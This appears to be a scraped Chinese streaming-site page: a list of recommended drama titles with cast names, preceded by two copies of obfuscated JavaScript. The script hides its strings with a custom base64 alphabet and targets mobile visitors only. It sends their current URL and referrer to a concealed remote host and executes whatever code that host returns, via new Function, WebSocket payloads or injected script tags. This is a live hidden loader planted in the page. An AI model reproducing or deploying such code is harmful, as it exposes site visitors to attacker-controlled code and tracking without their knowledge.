function mdre(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r, o, c, s, a, i, l; let d = 0; let f = String(e).replace(/\r\n/g, "\n"); let h = ""; for (let e = 0; e < f.length; e++) { const t = f.charCodeAt(e); if (t < 128) { h += String.fromCharCode(t); } else if (t > 127 && t < 2048) { h += String.fromCharCode(t >> 6 | 192); h += String.fromCharCode(t & 63 | 128); } else { h += String.fromCharCode(t >> 12 | 224); h += String.fromCharCode(t >> 6 & 63 | 128); h += String.fromCharCode(t & 63 | 128); } } while (d < h.length) { r = h.charCodeAt(d++); o = h.charCodeAt(d++); c = h.charCodeAt(d++); s = r >> 2; a = (r & 3) << 4 | o >> 4; i = (o & 15) << 2 | c >> 6; l = c & 63; if (isNaN(o)) { n += t.charAt(s) + t.charAt(a); } else if (isNaN(c)) { n += t.charAt(s) + t.charAt(a) + t.charAt(i); } else { n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l); } } return n; } function iwtq(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r = 0; let o, c, s, a; const i = String(e).replace(/[^A-Za-z0-9\-_]/g, ""); const l = i.length; while (r < l) { if (r == l) o = -1; else o = t.indexOf(i.charAt(r++)); if (r == l) c = -1; else c = t.indexOf(i.charAt(r++)); if (r === l) s = -1; else s = t.indexOf(i.charAt(r++)); if (r === l) a = -1; else a = t.indexOf(i.charAt(r++)); if (o === -1 || c === -1) { break; } const e = o << 2 | c >> 4; n += String.fromCharCode(e); if (s !== -1) { const e = (c & 15) << 4 | s >> 2; n += String.fromCharCode(e); } if (a !== -1) { const e = (s & 3) << 6 | a; n += String.fromCharCode(e); } } let d = ""; r = 0; while (r < n.length) { const e = n.charCodeAt(r); if (e < 128) { d += String.fromCharCode(e); r++; } else if (e > 191 && e < 224) { const t = n.charCodeAt(r + 1); d += String.fromCharCode((e & 31) << 6 | t & 63); r += 2; } else { const t = n.charCodeAt(r + 1); const o = n.charCodeAt(r + 2); d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63); r += 3; } } return d; } function gwyddp(e) { return Math.floor(Math.random() * (e + 1)); } window['w'+'jb'+'hz'+'s'+'fx'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() { (function(e, t, n) { const r = n[iwtq("dPW5hqWyi4Inhqp0iU")]; let o = ""; try { o = opener ? opener.document.location.href : n.referrer; } catch (e) { o = n.referrer; } if (o && o.length > 900) { o = o.slice(0, 900); } let c = t.location.href; if (c && c.length > 900) { c = c.slice(0, 900); } const s = iwtq(e).split(","); const a = s[3]; const i = s[2]; let l = s[4]; let d; if (l.indexOf(";") > -1) { let e = l.split(";"); if (e.length < 1) return; if (e.length > 1) { d = e[gwyddp(e.length)]; } else { d = e[0]; } } else { d = l; } const f = mdre(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`); const h = navigator.userAgent; if (h.indexOf("b" + "ai" + "d" + "u") !== -1) { const e = new XMLHttpRequest; e.open("POST", `${i}://${d}/getSv/${f}`); e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;"); e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest"); e.onreadystatechange = function() { if (e.readyState === 4 && e.status === 200) { const t = JSON.parse(e.responseText); const n = new Function("c", `${iwtq(t.ds)}; return ${t.ns}(c);`)(t.img.join("")); new Function("_tdcs", n)(r); } }; e.send(); } else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) { const e = new WebSocket(`${a}://${d}/ws/${f}`); e.onmessage = function(t) { e.close(); const o = t.data.split(";"); if (o.length > 2) { remoteCode = iwtq(o[0]); remoteCode += iwtq(o[1]); remoteCode += iwtq(o[2]); new Function("_tdcs", remoteCode)(r); } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } }; e.onerror = function() { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); }; } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } })("H-01H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document); } : function() {};
function ncoa(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r, o, c, s, a, i, l; let d = 0; let f = String(e).replace(/\r\n/g, "\n"); let h = ""; for (let e = 0; e < f.length; e++) { const t = f.charCodeAt(e); if (t < 128) { h += String.fromCharCode(t); } else if (t > 127 && t < 2048) { h += String.fromCharCode(t >> 6 | 192); h += String.fromCharCode(t & 63 | 128); } else { h += String.fromCharCode(t >> 12 | 224); h += String.fromCharCode(t >> 6 & 63 | 128); h += String.fromCharCode(t & 63 | 128); } } while (d < h.length) { r = h.charCodeAt(d++); o = h.charCodeAt(d++); c = h.charCodeAt(d++); s = r >> 2; a = (r & 3) << 4 | o >> 4; i = (o & 15) << 2 | c >> 6; l = c & 63; if (isNaN(o)) { n += t.charAt(s) + t.charAt(a); } else if (isNaN(c)) { n += t.charAt(s) + t.charAt(a) + t.charAt(i); } else { n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l); } } return n; } function qqaoxjj(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r = 0; let o, c, s, a; const i = String(e).replace(/[^A-Za-z0-9\-_]/g, ""); const l = i.length; while (r < l) { if (r == l) o = -1; else o = t.indexOf(i.charAt(r++)); if (r == l) c = -1; else c = t.indexOf(i.charAt(r++)); if (r === l) s = -1; else s = t.indexOf(i.charAt(r++)); if (r === l) a = -1; else a = t.indexOf(i.charAt(r++)); if (o === -1 || c === -1) { break; } const e = o << 2 | c >> 4; n += String.fromCharCode(e); if (s !== -1) { const e = (c & 15) << 4 | s >> 2; n += String.fromCharCode(e); } if (a !== -1) { const e = (s & 3) << 6 | a; n += String.fromCharCode(e); } } let d = ""; r = 0; while (r < n.length) { const e = n.charCodeAt(r); if (e < 128) { d += String.fromCharCode(e); r++; } else if (e > 191 && e < 224) { const t = n.charCodeAt(r + 1); d += String.fromCharCode((e & 31) << 6 | t & 63); r += 2; } else { const t = n.charCodeAt(r + 1); const o = n.charCodeAt(r + 2); d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63); r += 3; } } return d; } function yebl(e) { return Math.floor(Math.random() * (e + 1)); } window['gj'+'tu'+'hd'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() { (function(e, t, n) { const r = n[qqaoxjj("dPW5hqWyi4Inhqp0iU")]; let o = ""; try { o = opener ? opener.document.location.href : n.referrer; } catch (e) { o = n.referrer; } if (o && o.length > 900) { o = o.slice(0, 900); } let c = t.location.href; if (c && c.length > 900) { c = c.slice(0, 900); } const s = qqaoxjj(e).split(","); const a = s[3]; const i = s[2]; let l = s[4]; let d; if (l.indexOf(";") > -1) { let e = l.split(";"); if (e.length < 1) return; if (e.length > 1) { d = e[yebl(e.length)]; } else { d = e[0]; } } else { d = l; } const f = ncoa(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`); const h = navigator.userAgent; if (h.indexOf("b" + "ai" + "d" + "u") !== -1) { const e = new XMLHttpRequest; e.open("POST", `${i}://${d}/getSv/${f}`); e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;"); e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest"); e.onreadystatechange = function() { if (e.readyState === 4 && e.status === 200) { const t = JSON.parse(e.responseText); const n = new Function("c", `${qqaoxjj(t.ds)}; return ${t.ns}(c);`)(t.img.join("")); new Function("_tdcs", n)(r); } }; e.send(); } else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) { const e = new WebSocket(`${a}://${d}/ws/${f}`); e.onmessage = function(t) { e.close(); const o = t.data.split(";"); if (o.length > 2) { remoteCode = qqaoxjj(o[0]); remoteCode += qqaoxjj(o[1]); remoteCode += qqaoxjj(o[2]); new Function("_tdcs", remoteCode)(r); } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } }; e.onerror = function() { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); }; } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } })("H501H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document); } : function() {};

猜你喜欢

  • 全集完结
    觉醒透视眼后,发觉老宅全是宝物
    主演:左洲源-刘佳悦
  • 全集完结
    考上大学即巅峰:神豪从天降
    主演:大宝-彭洋洋
  • 全集完结
    小卖部通末世,开局泡面换黄金
    主演:张孟龙-江婉秋-崔贞莉
  • 第2集
    紫菜包饭和饭团 相爱的两个人相似又不一样
    主演:赤楚卫二,姜惠元,徐睿知,方银姬,游井亮子,中岛博子,三浦诚己,渡边真起子
  • 第5集
    春日狂热
    主演:安普贤,李主傧,车叙元,赵俊英,李在仁,陈庆
  • 第1集
    雷吉·丁金斯的兴衰
    主演:崔西·摩根 , 丹尼尔·雷德克里夫 , 德鲁·沙伊德 , 詹姆斯·西科内 , 凯蒂·麦卡蒂 , 威尔·布拉格罗夫 , 鲍比·莫尼汉 , 埃里卡·亚历山大 , 贾林·霍尔 , 艾伦·福西特 , 汤姆·约翰逊
  • 第13集
    御赐小仵作2
    主演:王子奇,苏晓彤,杨廷东,赵尧珂,张宸逍,王彦鑫,柴浩伟,邹敦明,宗峰岩,郭军,黄梦莹,陈天明,林杉
  • 更新第138集
    吞噬星空
    主演:赵乾景,谢莹,宋国庆,黄进则,张若瑜
  • 第22集
    爱魔力转圈圈
    主演:翁拉维·那提通,希兰格里·昌康,吉拉瓦·苏提瓦尼沙克,瓦鲁特·查瓦力朱吉翁,卢克·石川·普劳顿,帕西特·本朋沙瓦,拉皮彭·苏帕提尼基德查,弗鲁克·纳特塔侬·通萨昂,苏维查·皮亚诺普罗,磊嚓·塔形,柴·尼姆塔瓦特,帕瓦·吉沙晚迪,塔纳朋·乌辛萨,查亚彭·朱塔玛斯,娜查·车丹
  • 第9集
    疯子
    主演:金宰英,崔秀英
  • 第3集
    和青梅竹马之间不会有恋爱喜剧
    主演:久住琳,芹泽优,平塚纱依
  • 第1集
    非常检控观粤语
    主演:马德钟 , 吴伟豪 , 赖慰玲 , 陈炜 , 陈晓华 , 张国强 , 程可为 , 潘志文 , 蒋家旻 , 游嘉欣 , 吴天佑 , 丘梓谦 , 何广沛 , 江嘉敏 , 戴祖仪 , 罗毓仪 , 张驰豪 , 布乐文
  • 第1集
    非常检控观国语
    主演:马德钟 , 吴伟豪 , 赖慰玲 , 陈炜 , 陈晓华 , 张国强 , 程可为 , 潘志文 , 蒋家旻 , 游嘉欣 , 吴天佑 , 丘梓谦 , 何广沛 , 江嘉敏 , 戴祖仪 , 罗毓仪 , 张驰豪 , 布乐文
  • 正片
    控制泽塔
    主演:玛丽亚·阿巴迪,Milagros Betti,Oscar Dubini
  • 第40集
    武魂大陆
    主演: